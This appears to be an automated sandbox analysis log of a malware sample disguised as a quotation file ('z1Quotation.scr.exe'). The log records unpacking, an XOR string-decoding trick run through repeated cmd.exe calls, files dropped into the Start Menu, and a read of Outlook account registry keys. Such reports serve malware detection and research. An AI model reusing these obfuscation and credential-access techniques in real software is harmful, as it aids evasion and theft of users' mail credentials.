                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: pstorec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\Desktop\z1Quotation.scr.cfg
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: z1Quotation.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: c:\Projects\VS2005\BrowsingHistoryView\Release\BrowsingHistoryView.pdb source: z1Quotation.scr.exe
                Source: Binary string: D:\qb\workspace\23788\source\audio_codec\HDAudioDrv\x64\DAudRelease\IntcDAud.pdb source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 137.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 138.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 139.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 140.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 144.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 145.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 146.2.z1Quotation.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 140.2.z1Quotation.scr.exe.400000.0.unpack
                Source: Yara matchFile source: 00000000.00000002.33495375188.0000000006463000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.33493748290.0000000000637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.33493748290.0000000000685000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.33493748290.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z1Quotation.scr.exe PID: 2504, type: MEMORYSTR
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_6D431B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6D431B28
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044693D push ecx; ret 137_2_0044694D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044DB70 push eax; ret 137_2_0044DB84
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044DB70 push eax; ret 137_2_0044DBAC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00451D54 push eax; ret 137_2_00451D61
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0044B090 push eax; ret 138_2_0044B0A4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0044B090 push eax; ret 138_2_0044B0CC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00451D34 push eax; ret 138_2_00451D41
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00444E71 push ecx; ret 138_2_00444E81
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00414060 push eax; ret 139_2_00414074
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00414060 push eax; ret 139_2_0041409C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00414039 push ecx; ret 139_2_00414049
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004164EB push 0000006Ah; retf 139_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00416553 push 0000006Ah; retf 139_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00416555 push 0000006Ah; retf 139_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00445240 push eax; ret 140_2_00445254
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00445240 push eax; ret 140_2_0044527C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0044C670 push esp; retf 140_2_0044C671
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0044C6B4 push eax; ret 140_2_0044C6C1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00444EA1 push ecx; ret 140_2_00444EB1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00414060 push eax; ret 146_2_00414074
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00414060 push eax; ret 146_2_0041409C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00414039 push ecx; ret 146_2_00414049
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004164EB push 0000006Ah; retf 146_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00416553 push 0000006Ah; retf 146_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00416555 push 0000006Ah; retf 146_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dllJump to dropped file
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Siskenernes.Mom105Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Overtakes.flyJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Fodterapeut.BewJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Perichord.strJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Septifragal.flaJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Sesquihydrated12.txtJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Terpe.datJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\JolinesJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines\spirographin.surJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines\talpatate.lukJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,138_2_004047CB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
